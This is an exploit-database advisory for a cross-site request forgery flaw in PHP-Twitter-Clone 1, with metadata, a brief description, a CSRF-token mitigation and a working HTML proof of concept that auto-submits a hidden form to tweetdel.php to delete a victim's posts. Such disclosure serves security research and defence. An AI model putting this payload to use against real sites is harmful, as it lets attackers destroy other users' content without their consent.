Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)

vendor:

PHP-Twitter-Clone

by:

L0RD

3.1

CVSS

MEDIUM

Cross-Site Request Forgery

352

CWE

Product Name: PHP-Twitter-Clone

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:fyffe:php-twitter-clone

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Win 10

2018

Twitter-Clone 1 – Cross-Site Request Forgery (Delete Post)

An issue was discovered in Twitter-Clone 1 which allows a remote attacker to force any victim to delete posts. The attacker can craft a malicious HTML page with a form that submits to the tweetdel.php page with the ID of the post they want to delete. When the victim visits the page, the form is automatically submitted and the post is deleted.

Mitigation:

Implementing a CSRF token on the form to prevent unauthorized requests.

Source

Exploit-DB raw data:

# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
# Date: 2018-08-21
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Description :
# An issue was discovered in Twitter-Clone 1 which allows a remote
# attacker to force any victim to delete posts.

# POC :
# Delete posts exploit :

<html>
<head>
   <title>POC</title>
</head>
<body>
<form action='http://127.0.0.1/clone/twitter-clone/tweetdel.php?id="set
tweet id here of any post' method='post'>
  <input type='hidden' name='id' value='set tweet id here of any post' />
</form>
   <script>
      document.forms[0].submit();
   </script>
</body>
</html>